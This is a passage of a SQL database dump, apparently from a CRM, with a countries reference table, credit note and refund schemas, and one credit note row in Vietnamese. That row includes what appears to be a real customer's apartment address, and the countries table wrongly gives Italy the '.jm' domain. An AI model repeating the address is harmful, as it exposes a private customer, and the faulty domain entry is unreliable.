(8, 'AI', 'Anguilla', 'Anguilla', 'AIA', '660', 'no', '1+264', '.ai'),
(9, 'AQ', 'Antarctica', 'Antarctica', 'ATA', '010', 'no', '672', '.aq'),
(10, 'AG', 'Antigua and Barbuda', 'Antigua and Barbuda', 'ATG', '028', 'yes', '1+268', '.ag'),
(11, 'AR', 'Argentina', 'Argentine Republic', 'ARG', '032', 'yes', '54', '.ar'),
(12, 'AM', 'Armenia', 'Republic of Armenia', 'ARM', '051', 'yes', '374', '.am'),
(13, 'AW', 'Aruba', 'Aruba', 'ABW', '533', 'no', '297', '.aw'),
(14, 'AU', 'Australia', 'Commonwealth of Australia', 'AUS', '036', 'yes', '61', '.au'),
(15, 'AT', 'Austria', 'Republic of Austria', 'AUT', '040', 'yes', '43', '.at'),
(16, 'AZ', 'Azerbaijan', 'Republic of Azerbaijan', 'AZE', '031', 'yes', '994', '.az'),
(17, 'BS', 'Bahamas', 'Commonwealth of The Bahamas', 'BHS', '044', 'yes', '1+242', '.bs'),
(18, 'BH', 'Bahrain', 'Kingdom of Bahrain', 'BHR', '048', 'yes', '973', '.bh'),
(19, 'BD', 'Bangladesh', 'People\'s Republic of Bangladesh', 'BGD', '050', 'yes', '880', '.bd'),
(20, 'BB', 'Barbados', 'Barbados', 'BRB', '052', 'yes', '1+246', '.bb'),
(21, 'BY', 'Belarus', 'Republic of Belarus', 'BLR', '112', 'yes', '375', '.by'),
(22, 'BE', 'Belgium', 'Kingdom of Belgium', 'BEL', '056', 'yes', '32', '.be'),
(23, 'BZ', 'Belize', 'Belize', 'BLZ', '084', 'yes', '501', '.bz'),
(24, 'BJ', 'Benin', 'Republic of Benin', 'BEN', '204', 'yes', '229', '.bj'),
(25, 'BM', 'Bermuda', 'Bermuda Islands', 'BMU', '060', 'no', '1+441', '.bm'),
(26, 'BT', 'Bhutan', 'Kingdom of Bhutan', 'BTN', '064', 'yes', '975', '.bt'),
(27, 'BO', 'Bolivia', 'Plurinational State of Bolivia', 'BOL', '068', 'yes', '591', '.bo'),
(28, 'BQ', 'Bonaire, Sint Eustatius and Saba', 'Bonaire, Sint Eustatius and Saba', 'BES', '535', 'no', '599', '.bq'),
(29, 'BA', 'Bosnia and Herzegovina', 'Bosnia and Herzegovina', 'BIH', '070', 'yes', '387', '.ba'),
(30, 'BW', 'Botswana', 'Republic of Botswana', 'BWA', '072', 'yes', '267', '.bw'),
(31, 'BV', 'Bouvet Island', 'Bouvet Island', 'BVT', '074', 'no', 'NONE', '.bv'),
(32, 'BR', 'Brazil', 'Federative Republic of Brazil', 'BRA', '076', 'yes', '55', '.br'),
(33, 'IO', 'British Indian Ocean Territory', 'British Indian Ocean Territory', 'IOT', '086', 'no', '246', '.io'),
(34, 'BN', 'Brunei', 'Brunei Darussalam', 'BRN', '096', 'yes', '673', '.bn'),
(35, 'BG', 'Bulgaria', 'Republic of Bulgaria', 'BGR', '100', 'yes', '359', '.bg'),
(36, 'BF', 'Burkina Faso', 'Burkina Faso', 'BFA', '854', 'yes', '226', '.bf'),
(37, 'BI', 'Burundi', 'Republic of Burundi', 'BDI', '108', 'yes', '257', '.bi'),
(38, 'KH', 'Cambodia', 'Kingdom of Cambodia', 'KHM', '116', 'yes', '855', '.kh'),
(39, 'CM', 'Cameroon', 'Republic of Cameroon', 'CMR', '120', 'yes', '237', '.cm'),
(40, 'CA', 'Canada', 'Canada', 'CAN', '124', 'yes', '1', '.ca'),
(41, 'CV', 'Cape Verde', 'Republic of Cape Verde', 'CPV', '132', 'yes', '238', '.cv'),
(42, 'KY', 'Cayman Islands', 'The Cayman Islands', 'CYM', '136', 'no', '1+345', '.ky'),
(43, 'CF', 'Central African Republic', 'Central African Republic', 'CAF', '140', 'yes', '236', '.cf'),
(44, 'TD', 'Chad', 'Republic of Chad', 'TCD', '148', 'yes', '235', '.td'),
(45, 'CL', 'Chile', 'Republic of Chile', 'CHL', '152', 'yes', '56', '.cl'),
(46, 'CN', 'China', 'People\'s Republic of China', 'CHN', '156', 'yes', '86', '.cn'),
(47, 'CX', 'Christmas Island', 'Christmas Island', 'CXR', '162', 'no', '61', '.cx'),
(48, 'CC', 'Cocos (Keeling) Islands', 'Cocos (Keeling) Islands', 'CCK', '166', 'no', '61', '.cc'),
(49, 'CO', 'Colombia', 'Republic of Colombia', 'COL', '170', 'yes', '57', '.co'),
(50, 'KM', 'Comoros', 'Union of the Comoros', 'COM', '174', 'yes', '269', '.km'),
(51, 'CG', 'Congo', 'Republic of the Congo', 'COG', '178', 'yes', '242', '.cg'),
(52, 'CK', 'Cook Islands', 'Cook Islands', 'COK', '184', 'some', '682', '.ck'),
(53, 'CR', 'Costa Rica', 'Republic of Costa Rica', 'CRI', '188', 'yes', '506', '.cr'),
(54, 'CI', 'Cote d\'ivoire (Ivory Coast)', 'Republic of C&ocirc;te D\'Ivoire (Ivory Coast)', 'CIV', '384', 'yes', '225', '.ci'),
(55, 'HR', 'Croatia', 'Republic of Croatia', 'HRV', '191', 'yes', '385', '.hr'),
(56, 'CU', 'Cuba', 'Republic of Cuba', 'CUB', '192', 'yes', '53', '.cu'),
(57, 'CW', 'Curacao', 'Cura&ccedil;ao', 'CUW', '531', 'no', '599', '.cw'),
(58, 'CY', 'Cyprus', 'Republic of Cyprus', 'CYP', '196', 'yes', '357', '.cy'),
(59, 'CZ', 'Czech Republic', 'Czech Republic', 'CZE', '203', 'yes', '420', '.cz'),
(60, 'CD', 'Democratic Republic of the Congo', 'Democratic Republic of the Congo', 'COD', '180', 'yes', '243', '.cd'),
(61, 'DK', 'Denmark', 'Kingdom of Denmark', 'DNK', '208', 'yes', '45', '.dk'),
(62, 'DJ', 'Djibouti', 'Republic of Djibouti', 'DJI', '262', 'yes', '253', '.dj'),
(63, 'DM', 'Dominica', 'Commonwealth of Dominica', 'DMA', '212', 'yes', '1+767', '.dm'),
(64, 'DO', 'Dominican Republic', 'Dominican Republic', 'DOM', '214', 'yes', '1+809, 8', '.do'),
(65, 'EC', 'Ecuador', 'Republic of Ecuador', 'ECU', '218', 'yes', '593', '.ec'),
(66, 'EG', 'Egypt', 'Arab Republic of Egypt', 'EGY', '818', 'yes', '20', '.eg'),
(67, 'SV', 'El Salvador', 'Republic of El Salvador', 'SLV', '222', 'yes', '503', '.sv'),
(68, 'GQ', 'Equatorial Guinea', 'Republic of Equatorial Guinea', 'GNQ', '226', 'yes', '240', '.gq'),
(69, 'ER', 'Eritrea', 'State of Eritrea', 'ERI', '232', 'yes', '291', '.er'),
(70, 'EE', 'Estonia', 'Republic of Estonia', 'EST', '233', 'yes', '372', '.ee'),
(71, 'ET', 'Ethiopia', 'Federal Democratic Republic of Ethiopia', 'ETH', '231', 'yes', '251', '.et'),
(72, 'FK', 'Falkland Islands (Malvinas)', 'The Falkland Islands (Malvinas)', 'FLK', '238', 'no', '500', '.fk'),
(73, 'FO', 'Faroe Islands', 'The Faroe Islands', 'FRO', '234', 'no', '298', '.fo'),
(74, 'FJ', 'Fiji', 'Republic of Fiji', 'FJI', '242', 'yes', '679', '.fj'),
(75, 'FI', 'Finland', 'Republic of Finland', 'FIN', '246', 'yes', '358', '.fi'),
(76, 'FR', 'France', 'French Republic', 'FRA', '250', 'yes', '33', '.fr'),
(77, 'GF', 'French Guiana', 'French Guiana', 'GUF', '254', 'no', '594', '.gf'),
(78, 'PF', 'French Polynesia', 'French Polynesia', 'PYF', '258', 'no', '689', '.pf'),
(79, 'TF', 'French Southern Territories', 'French Southern Territories', 'ATF', '260', 'no', NULL, '.tf'),
(80, 'GA', 'Gabon', 'Gabonese Republic', 'GAB', '266', 'yes', '241', '.ga'),
(81, 'GM', 'Gambia', 'Republic of The Gambia', 'GMB', '270', 'yes', '220', '.gm'),
(82, 'GE', 'Georgia', 'Georgia', 'GEO', '268', 'yes', '995', '.ge'),
(83, 'DE', 'Germany', 'Federal Republic of Germany', 'DEU', '276', 'yes', '49', '.de'),
(84, 'GH', 'Ghana', 'Republic of Ghana', 'GHA', '288', 'yes', '233', '.gh'),
(85, 'GI', 'Gibraltar', 'Gibraltar', 'GIB', '292', 'no', '350', '.gi'),
(86, 'GR', 'Greece', 'Hellenic Republic', 'GRC', '300', 'yes', '30', '.gr'),
(87, 'GL', 'Greenland', 'Greenland', 'GRL', '304', 'no', '299', '.gl'),
(88, 'GD', 'Grenada', 'Grenada', 'GRD', '308', 'yes', '1+473', '.gd'),
(89, 'GP', 'Guadaloupe', 'Guadeloupe', 'GLP', '312', 'no', '590', '.gp'),
(90, 'GU', 'Guam', 'Guam', 'GUM', '316', 'no', '1+671', '.gu'),
(91, 'GT', 'Guatemala', 'Republic of Guatemala', 'GTM', '320', 'yes', '502', '.gt'),
(92, 'GG', 'Guernsey', 'Guernsey', 'GGY', '831', 'no', '44', '.gg'),
(93, 'GN', 'Guinea', 'Republic of Guinea', 'GIN', '324', 'yes', '224', '.gn'),
(94, 'GW', 'Guinea-Bissau', 'Republic of Guinea-Bissau', 'GNB', '624', 'yes', '245', '.gw'),
(95, 'GY', 'Guyana', 'Co-operative Republic of Guyana', 'GUY', '328', 'yes', '592', '.gy'),
(96, 'HT', 'Haiti', 'Republic of Haiti', 'HTI', '332', 'yes', '509', '.ht'),
(97, 'HM', 'Heard Island and McDonald Islands', 'Heard Island and McDonald Islands', 'HMD', '334', 'no', 'NONE', '.hm'),
(98, 'HN', 'Honduras', 'Republic of Honduras', 'HND', '340', 'yes', '504', '.hn'),
(99, 'HK', 'Hong Kong', 'Hong Kong', 'HKG', '344', 'no', '852', '.hk'),
(100, 'HU', 'Hungary', 'Hungary', 'HUN', '348', 'yes', '36', '.hu'),
(101, 'IS', 'Iceland', 'Republic of Iceland', 'ISL', '352', 'yes', '354', '.is'),
(102, 'IN', 'India', 'Republic of India', 'IND', '356', 'yes', '91', '.in'),
(103, 'ID', 'Indonesia', 'Republic of Indonesia', 'IDN', '360', 'yes', '62', '.id'),
(104, 'IR', 'Iran', 'Islamic Republic of Iran', 'IRN', '364', 'yes', '98', '.ir'),
(105, 'IQ', 'Iraq', 'Republic of Iraq', 'IRQ', '368', 'yes', '964', '.iq'),
(106, 'IE', 'Ireland', 'Ireland', 'IRL', '372', 'yes', '353', '.ie'),
(107, 'IM', 'Isle of Man', 'Isle of Man', 'IMN', '833', 'no', '44', '.im'),
(108, 'IL', 'Israel', 'State of Israel', 'ISR', '376', 'yes', '972', '.il'),
(109, 'IT', 'Italy', 'Italian Republic', 'ITA', '380', 'yes', '39', '.jm'),
(110, 'JM', 'Jamaica', 'Jamaica', 'JAM', '388', 'yes', '1+876', '.jm'),
(111, 'JP', 'Japan', 'Japan', 'JPN', '392', 'yes', '81', '.jp'),
(112, 'JE', 'Jersey', 'The Bailiwick of Jersey', 'JEY', '832', 'no', '44', '.je'),
(113, 'JO', 'Jordan', 'Hashemite Kingdom of Jordan', 'JOR', '400', 'yes', '962', '.jo'),
(114, 'KZ', 'Kazakhstan', 'Republic of Kazakhstan', 'KAZ', '398', 'yes', '7', '.kz'),
(115, 'KE', 'Kenya', 'Republic of Kenya', 'KEN', '404', 'yes', '254', '.ke'),
(116, 'KI', 'Kiribati', 'Republic of Kiribati', 'KIR', '296', 'yes', '686', '.ki'),
(117, 'XK', 'Kosovo', 'Republic of Kosovo', '---', '---', 'some', '381', ''),
(118, 'KW', 'Kuwait', 'State of Kuwait', 'KWT', '414', 'yes', '965', '.kw'),
(119, 'KG', 'Kyrgyzstan', 'Kyrgyz Republic', 'KGZ', '417', 'yes', '996', '.kg'),
(120, 'LA', 'Laos', 'Lao People\'s Democratic Republic', 'LAO', '418', 'yes', '856', '.la'),
(121, 'LV', 'Latvia', 'Republic of Latvia', 'LVA', '428', 'yes', '371', '.lv'),
(122, 'LB', 'Lebanon', 'Republic of Lebanon', 'LBN', '422', 'yes', '961', '.lb'),
(123, 'LS', 'Lesotho', 'Kingdom of Lesotho', 'LSO', '426', 'yes', '266', '.ls'),
(124, 'LR', 'Liberia', 'Republic of Liberia', 'LBR', '430', 'yes', '231', '.lr'),
(125, 'LY', 'Libya', 'Libya', 'LBY', '434', 'yes', '218', '.ly'),
(126, 'LI', 'Liechtenstein', 'Principality of Liechtenstein', 'LIE', '438', 'yes', '423', '.li'),
(127, 'LT', 'Lithuania', 'Republic of Lithuania', 'LTU', '440', 'yes', '370', '.lt'),
(128, 'LU', 'Luxembourg', 'Grand Duchy of Luxembourg', 'LUX', '442', 'yes', '352', '.lu'),
(129, 'MO', 'Macao', 'The Macao Special Administrative Region', 'MAC', '446', 'no', '853', '.mo'),
(130, 'MK', 'North Macedonia', 'Republic of North Macedonia', 'MKD', '807', 'yes', '389', '.mk'),
(131, 'MG', 'Madagascar', 'Republic of Madagascar', 'MDG', '450', 'yes', '261', '.mg'),
(132, 'MW', 'Malawi', 'Republic of Malawi', 'MWI', '454', 'yes', '265', '.mw'),
(133, 'MY', 'Malaysia', 'Malaysia', 'MYS', '458', 'yes', '60', '.my'),
(134, 'MV', 'Maldives', 'Republic of Maldives', 'MDV', '462', 'yes', '960', '.mv'),
(135, 'ML', 'Mali', 'Republic of Mali', 'MLI', '466', 'yes', '223', '.ml'),
(136, 'MT', 'Malta', 'Republic of Malta', 'MLT', '470', 'yes', '356', '.mt'),
(137, 'MH', 'Marshall Islands', 'Republic of the Marshall Islands', 'MHL', '584', 'yes', '692', '.mh'),
(138, 'MQ', 'Martinique', 'Martinique', 'MTQ', '474', 'no', '596', '.mq'),
(139, 'MR', 'Mauritania', 'Islamic Republic of Mauritania', 'MRT', '478', 'yes', '222', '.mr'),
(140, 'MU', 'Mauritius', 'Republic of Mauritius', 'MUS', '480', 'yes', '230', '.mu'),
(141, 'YT', 'Mayotte', 'Mayotte', 'MYT', '175', 'no', '262', '.yt'),
(142, 'MX', 'Mexico', 'United Mexican States', 'MEX', '484', 'yes', '52', '.mx'),
(143, 'FM', 'Micronesia', 'Federated States of Micronesia', 'FSM', '583', 'yes', '691', '.fm'),
(144, 'MD', 'Moldava', 'Republic of Moldova', 'MDA', '498', 'yes', '373', '.md'),
(145, 'MC', 'Monaco', 'Principality of Monaco', 'MCO', '492', 'yes', '377', '.mc'),
(146, 'MN', 'Mongolia', 'Mongolia', 'MNG', '496', 'yes', '976', '.mn'),
(147, 'ME', 'Montenegro', 'Montenegro', 'MNE', '499', 'yes', '382', '.me'),
(148, 'MS', 'Montserrat', 'Montserrat', 'MSR', '500', 'no', '1+664', '.ms'),
(149, 'MA', 'Morocco', 'Kingdom of Morocco', 'MAR', '504', 'yes', '212', '.ma'),
(150, 'MZ', 'Mozambique', 'Republic of Mozambique', 'MOZ', '508', 'yes', '258', '.mz'),
(151, 'MM', 'Myanmar (Burma)', 'Republic of the Union of Myanmar', 'MMR', '104', 'yes', '95', '.mm'),
(152, 'NA', 'Namibia', 'Republic of Namibia', 'NAM', '516', 'yes', '264', '.na'),
(153, 'NR', 'Nauru', 'Republic of Nauru', 'NRU', '520', 'yes', '674', '.nr'),
(154, 'NP', 'Nepal', 'Federal Democratic Republic of Nepal', 'NPL', '524', 'yes', '977', '.np'),
(155, 'NL', 'Netherlands', 'Kingdom of the Netherlands', 'NLD', '528', 'yes', '31', '.nl'),
(156, 'NC', 'New Caledonia', 'New Caledonia', 'NCL', '540', 'no', '687', '.nc'),
(157, 'NZ', 'New Zealand', 'New Zealand', 'NZL', '554', 'yes', '64', '.nz'),
(158, 'NI', 'Nicaragua', 'Republic of Nicaragua', 'NIC', '558', 'yes', '505', '.ni'),
(159, 'NE', 'Niger', 'Republic of Niger', 'NER', '562', 'yes', '227', '.ne'),
(160, 'NG', 'Nigeria', 'Federal Republic of Nigeria', 'NGA', '566', 'yes', '234', '.ng'),
(161, 'NU', 'Niue', 'Niue', 'NIU', '570', 'some', '683', '.nu'),
(162, 'NF', 'Norfolk Island', 'Norfolk Island', 'NFK', '574', 'no', '672', '.nf'),
(163, 'KP', 'North Korea', 'Democratic People\'s Republic of Korea', 'PRK', '408', 'yes', '850', '.kp'),
(164, 'MP', 'Northern Mariana Islands', 'Northern Mariana Islands', 'MNP', '580', 'no', '1+670', '.mp'),
(165, 'NO', 'Norway', 'Kingdom of Norway', 'NOR', '578', 'yes', '47', '.no'),
(166, 'OM', 'Oman', 'Sultanate of Oman', 'OMN', '512', 'yes', '968', '.om'),
(167, 'PK', 'Pakistan', 'Islamic Republic of Pakistan', 'PAK', '586', 'yes', '92', '.pk'),
(168, 'PW', 'Palau', 'Republic of Palau', 'PLW', '585', 'yes', '680', '.pw'),
(169, 'PS', 'Palestine', 'State of Palestine (or Occupied Palestinian Territory)', 'PSE', '275', 'some', '970', '.ps'),
(170, 'PA', 'Panama', 'Republic of Panama', 'PAN', '591', 'yes', '507', '.pa'),
(171, 'PG', 'Papua New Guinea', 'Independent State of Papua New Guinea', 'PNG', '598', 'yes', '675', '.pg'),
(172, 'PY', 'Paraguay', 'Republic of Paraguay', 'PRY', '600', 'yes', '595', '.py'),
(173, 'PE', 'Peru', 'Republic of Peru', 'PER', '604', 'yes', '51', '.pe'),
(174, 'PH', 'Philippines', 'Republic of the Philippines', 'PHL', '608', 'yes', '63', '.ph'),
(175, 'PN', 'Pitcairn', 'Pitcairn', 'PCN', '612', 'no', 'NONE', '.pn'),
(176, 'PL', 'Poland', 'Republic of Poland', 'POL', '616', 'yes', '48', '.pl'),
(177, 'PT', 'Portugal', 'Portuguese Republic', 'PRT', '620', 'yes', '351', '.pt'),
(178, 'PR', 'Puerto Rico', 'Commonwealth of Puerto Rico', 'PRI', '630', 'no', '1+939', '.pr'),
(179, 'QA', 'Qatar', 'State of Qatar', 'QAT', '634', 'yes', '974', '.qa'),
(180, 'RE', 'Reunion', 'R&eacute;union', 'REU', '638', 'no', '262', '.re'),
(181, 'RO', 'Romania', 'Romania', 'ROU', '642', 'yes', '40', '.ro'),
(182, 'RU', 'Russia', 'Russian Federation', 'RUS', '643', 'yes', '7', '.ru'),
(183, 'RW', 'Rwanda', 'Republic of Rwanda', 'RWA', '646', 'yes', '250', '.rw'),
(184, 'BL', 'Saint Barthelemy', 'Saint Barth&eacute;lemy', 'BLM', '652', 'no', '590', '.bl'),
(185, 'SH', 'Saint Helena', 'Saint Helena, Ascension and Tristan da Cunha', 'SHN', '654', 'no', '290', '.sh'),
(186, 'KN', 'Saint Kitts and Nevis', 'Federation of Saint Christopher and Nevis', 'KNA', '659', 'yes', '1+869', '.kn'),
(187, 'LC', 'Saint Lucia', 'Saint Lucia', 'LCA', '662', 'yes', '1+758', '.lc'),
(188, 'MF', 'Saint Martin', 'Saint Martin', 'MAF', '663', 'no', '590', '.mf'),
(189, 'PM', 'Saint Pierre and Miquelon', 'Saint Pierre and Miquelon', 'SPM', '666', 'no', '508', '.pm'),
(190, 'VC', 'Saint Vincent and the Grenadines', 'Saint Vincent and the Grenadines', 'VCT', '670', 'yes', '1+784', '.vc'),
(191, 'WS', 'Samoa', 'Independent State of Samoa', 'WSM', '882', 'yes', '685', '.ws'),
(192, 'SM', 'San Marino', 'Republic of San Marino', 'SMR', '674', 'yes', '378', '.sm'),
(193, 'ST', 'Sao Tome and Principe', 'Democratic Republic of S&atilde;o Tom&eacute; and Pr&iacute;ncipe', 'STP', '678', 'yes', '239', '.st'),
(194, 'SA', 'Saudi Arabia', 'Kingdom of Saudi Arabia', 'SAU', '682', 'yes', '966', '.sa'),
(195, 'SN', 'Senegal', 'Republic of Senegal', 'SEN', '686', 'yes', '221', '.sn'),
(196, 'RS', 'Serbia', 'Republic of Serbia', 'SRB', '688', 'yes', '381', '.rs'),
(197, 'SC', 'Seychelles', 'Republic of Seychelles', 'SYC', '690', 'yes', '248', '.sc'),
(198, 'SL', 'Sierra Leone', 'Republic of Sierra Leone', 'SLE', '694', 'yes', '232', '.sl'),
(199, 'SG', 'Singapore', 'Republic of Singapore', 'SGP', '702', 'yes', '65', '.sg'),
(200, 'SX', 'Sint Maarten', 'Sint Maarten', 'SXM', '534', 'no', '1+721', '.sx'),
(201, 'SK', 'Slovakia', 'Slovak Republic', 'SVK', '703', 'yes', '421', '.sk'),
(202, 'SI', 'Slovenia', 'Republic of Slovenia', 'SVN', '705', 'yes', '386', '.si'),
(203, 'SB', 'Solomon Islands', 'Solomon Islands', 'SLB', '090', 'yes', '677', '.sb'),
(204, 'SO', 'Somalia', 'Somali Republic', 'SOM', '706', 'yes', '252', '.so'),
(205, 'ZA', 'South Africa', 'Republic of South Africa', 'ZAF', '710', 'yes', '27', '.za'),
(206, 'GS', 'South Georgia and the South Sandwich Islands', 'South Georgia and the South Sandwich Islands', 'SGS', '239', 'no', '500', '.gs'),
(207, 'KR', 'South Korea', 'Republic of Korea', 'KOR', '410', 'yes', '82', '.kr'),
(208, 'SS', 'South Sudan', 'Republic of South Sudan', 'SSD', '728', 'yes', '211', '.ss'),
(209, 'ES', 'Spain', 'Kingdom of Spain', 'ESP', '724', 'yes', '34', '.es'),
(210, 'LK', 'Sri Lanka', 'Democratic Socialist Republic of Sri Lanka', 'LKA', '144', 'yes', '94', '.lk'),
(211, 'SD', 'Sudan', 'Republic of the Sudan', 'SDN', '729', 'yes', '249', '.sd'),
(212, 'SR', 'Suriname', 'Republic of Suriname', 'SUR', '740', 'yes', '597', '.sr'),
(213, 'SJ', 'Svalbard and Jan Mayen', 'Svalbard and Jan Mayen', 'SJM', '744', 'no', '47', '.sj'),
(214, 'SZ', 'Swaziland', 'Kingdom of Swaziland', 'SWZ', '748', 'yes', '268', '.sz'),
(215, 'SE', 'Sweden', 'Kingdom of Sweden', 'SWE', '752', 'yes', '46', '.se'),
(216, 'CH', 'Switzerland', 'Swiss Confederation', 'CHE', '756', 'yes', '41', '.ch'),
(217, 'SY', 'Syria', 'Syrian Arab Republic', 'SYR', '760', 'yes', '963', '.sy'),
(218, 'TW', 'Taiwan', 'Republic of China (Taiwan)', 'TWN', '158', 'former', '886', '.tw'),
(219, 'TJ', 'Tajikistan', 'Republic of Tajikistan', 'TJK', '762', 'yes', '992', '.tj'),
(220, 'TZ', 'Tanzania', 'United Republic of Tanzania', 'TZA', '834', 'yes', '255', '.tz'),
(221, 'TH', 'Thailand', 'Kingdom of Thailand', 'THA', '764', 'yes', '66', '.th'),
(222, 'TL', 'Timor-Leste (East Timor)', 'Democratic Republic of Timor-Leste', 'TLS', '626', 'yes', '670', '.tl'),
(223, 'TG', 'Togo', 'Togolese Republic', 'TGO', '768', 'yes', '228', '.tg'),
(224, 'TK', 'Tokelau', 'Tokelau', 'TKL', '772', 'no', '690', '.tk'),
(225, 'TO', 'Tonga', 'Kingdom of Tonga', 'TON', '776', 'yes', '676', '.to'),
(226, 'TT', 'Trinidad and Tobago', 'Republic of Trinidad and Tobago', 'TTO', '780', 'yes', '1+868', '.tt'),
(227, 'TN', 'Tunisia', 'Republic of Tunisia', 'TUN', '788', 'yes', '216', '.tn'),
(228, 'TR', 'Turkey', 'Republic of Turkey', 'TUR', '792', 'yes', '90', '.tr'),
(229, 'TM', 'Turkmenistan', 'Turkmenistan', 'TKM', '795', 'yes', '993', '.tm'),
(230, 'TC', 'Turks and Caicos Islands', 'Turks and Caicos Islands', 'TCA', '796', 'no', '1+649', '.tc'),
(231, 'TV', 'Tuvalu', 'Tuvalu', 'TUV', '798', 'yes', '688', '.tv'),
(232, 'UG', 'Uganda', 'Republic of Uganda', 'UGA', '800', 'yes', '256', '.ug'),
(233, 'UA', 'Ukraine', 'Ukraine', 'UKR', '804', 'yes', '380', '.ua'),
(234, 'AE', 'United Arab Emirates', 'United Arab Emirates', 'ARE', '784', 'yes', '971', '.ae'),
(235, 'GB', 'United Kingdom', 'United Kingdom of Great Britain and Nothern Ireland', 'GBR', '826', 'yes', '44', '.uk'),
(236, 'US', 'United States', 'United States of America', 'USA', '840', 'yes', '1', '.us'),
(237, 'UM', 'United States Minor Outlying Islands', 'United States Minor Outlying Islands', 'UMI', '581', 'no', 'NONE', 'NONE'),
(238, 'UY', 'Uruguay', 'Eastern Republic of Uruguay', 'URY', '858', 'yes', '598', '.uy'),
(239, 'UZ', 'Uzbekistan', 'Republic of Uzbekistan', 'UZB', '860', 'yes', '998', '.uz'),
(240, 'VU', 'Vanuatu', 'Republic of Vanuatu', 'VUT', '548', 'yes', '678', '.vu'),
(241, 'VA', 'Vatican City', 'State of the Vatican City', 'VAT', '336', 'no', '39', '.va'),
(242, 'VE', 'Venezuela', 'Bolivarian Republic of Venezuela', 'VEN', '862', 'yes', '58', '.ve'),
(243, 'VN', 'Vietnam', 'Socialist Republic of Vietnam', 'VNM', '704', 'yes', '84', '.vn'),
(244, 'VG', 'Virgin Islands, British', 'British Virgin Islands', 'VGB', '092', 'no', '1+284', '.vg'),
(245, 'VI', 'Virgin Islands, US', 'Virgin Islands of the United States', 'VIR', '850', 'no', '1+340', '.vi'),
(246, 'WF', 'Wallis and Futuna', 'Wallis and Futuna', 'WLF', '876', 'no', '681', '.wf'),
(247, 'EH', 'Western Sahara', 'Western Sahara', 'ESH', '732', 'no', '212', '.eh'),
(248, 'YE', 'Yemen', 'Republic of Yemen', 'YEM', '887', 'yes', '967', '.ye'),
(249, 'ZM', 'Zambia', 'Republic of Zambia', 'ZMB', '894', 'yes', '260', '.zm'),
(250, 'ZW', 'Zimbabwe', 'Republic of Zimbabwe', 'ZWE', '716', 'yes', '263', '.zw');

-- --------------------------------------------------------

--
-- Table structure for table `tblcreditnotes`
--

CREATE TABLE `tblcreditnotes` (
  `id` int(11) NOT NULL,
  `clientid` int(11) NOT NULL,
  `deleted_customer_name` varchar(100) DEFAULT NULL,
  `number` int(11) NOT NULL,
  `prefix` varchar(50) DEFAULT NULL,
  `number_format` int(11) NOT NULL DEFAULT 1,
  `datecreated` datetime NOT NULL,
  `date` date NOT NULL,
  `adminnote` text DEFAULT NULL,
  `terms` text DEFAULT NULL,
  `clientnote` text DEFAULT NULL,
  `currency` int(11) NOT NULL,
  `subtotal` decimal(15,2) NOT NULL,
  `total_tax` decimal(15,2) NOT NULL DEFAULT 0.00,
  `total` decimal(15,2) NOT NULL,
  `adjustment` decimal(15,2) DEFAULT NULL,
  `addedfrom` int(11) DEFAULT NULL,
  `status` int(11) DEFAULT 1,
  `project_id` int(11) NOT NULL DEFAULT 0,
  `discount_percent` decimal(15,2) DEFAULT 0.00,
  `discount_total` decimal(15,2) DEFAULT 0.00,
  `discount_type` varchar(30) NOT NULL,
  `billing_street` varchar(200) DEFAULT NULL,
  `billing_city` varchar(100) DEFAULT NULL,
  `billing_state` varchar(100) DEFAULT NULL,
  `billing_zip` varchar(100) DEFAULT NULL,
  `billing_country` int(11) DEFAULT NULL,
  `shipping_street` varchar(200) DEFAULT NULL,
  `shipping_city` varchar(100) DEFAULT NULL,
  `shipping_state` varchar(100) DEFAULT NULL,
  `shipping_zip` varchar(100) DEFAULT NULL,
  `shipping_country` int(11) DEFAULT NULL,
  `include_shipping` tinyint(1) NOT NULL,
  `show_shipping_on_credit_note` tinyint(1) NOT NULL DEFAULT 1,
  `show_quantity_as` int(11) NOT NULL DEFAULT 1,
  `reference_no` varchar(100) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblcreditnotes`
--

INSERT INTO `tblcreditnotes` (`id`, `clientid`, `deleted_customer_name`, `number`, `prefix`, `number_format`, `datecreated`, `date`, `adminnote`, `terms`, `clientnote`, `currency`, `subtotal`, `total_tax`, `total`, `adjustment`, `addedfrom`, `status`, `project_id`, `discount_percent`, `discount_total`, `discount_type`, `billing_street`, `billing_city`, `billing_state`, `billing_zip`, `billing_country`, `shipping_street`, `shipping_city`, `shipping_state`, `shipping_zip`, `shipping_country`, `include_shipping`, `show_shipping_on_credit_note`, `show_quantity_as`, `reference_no`) VALUES
(10, 756, NULL, 10, 'CN-', 2, '2022-03-31 16:12:48', '2022-03-31', '', '- Thời gian bảo hành hoạt động motor: 05 năm; phụ kiện (đèn LED, điều khiển...)các bề mặt hoàn thiện sơn khác bảo hành 01 năm.<br />\r\n- Các bảo hành khác như thay PIN điều khiển miễn phí trong 06 tháng <br />\r\n- Bảo bảo hành sự cố rung rắc, tiếng động sau khi nghiệm thu trong 01 tháng sau khi lắp đặt. Còn lại sau đó tính phí 150k/lần', '', 3, 0.00, 0.00, 0.00, 0.00, 1, 1, 0, 20.00, 0.00, '', 'C2.05-chung cư RiverPark Premier, H24, Phường Tân Phong, Quận 7', '', '', '', 0, 'C2.05-chung cư RiverPark Premier, H24, Phường Tân Phong, Quận 7', '', '', '', 0, 1, 1, 1, 'INV-5-21');

-- --------------------------------------------------------

--
-- Table structure for table `tblcreditnote_refunds`
--

CREATE TABLE `tblcreditnote_refunds` (
  `id` int(11) NOT NULL,
  `credit_note_id` int(11) NOT NULL,
  `staff_id` int(11) NOT NULL,
  `refunded_on` date NOT NULL,
  `payment_mode` varchar(40) NOT NULL,
  `note` text DEFAULT NULL,
  `amount` decimal(15,2) NOT NULL,
  `created_at` datetime DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblcreditnote_refunds`
--

INSERT INTO `tblcreditnote_refunds` (`id`, `credit_note_id`, `staff_id`, `refunded_on`, `payment_mode`, `note`, `amount`, `created_at`) VALUES
(1, 2, 1, '2022-01-12', '1', '', 127800000.00, '2022-01-12 11:59:29'),
(2, 4, 3, '2022-01-17', '1', '', 25650000.00, '2022-01-17 09:41:32');

-- --------------------------------------------------------

--
-- Table structure for table `tblcredits`
--

CREATE TABLE `tblcredits` (
  `id` int(11) NOT NULL,
  `invoice_id` int(11) NOT NULL,
  `credit_id` int(11) NOT NULL,
  `staff_id` int(11) NOT NULL,
  `date` date NOT NULL,
  `date_applied` datetime NOT NULL,
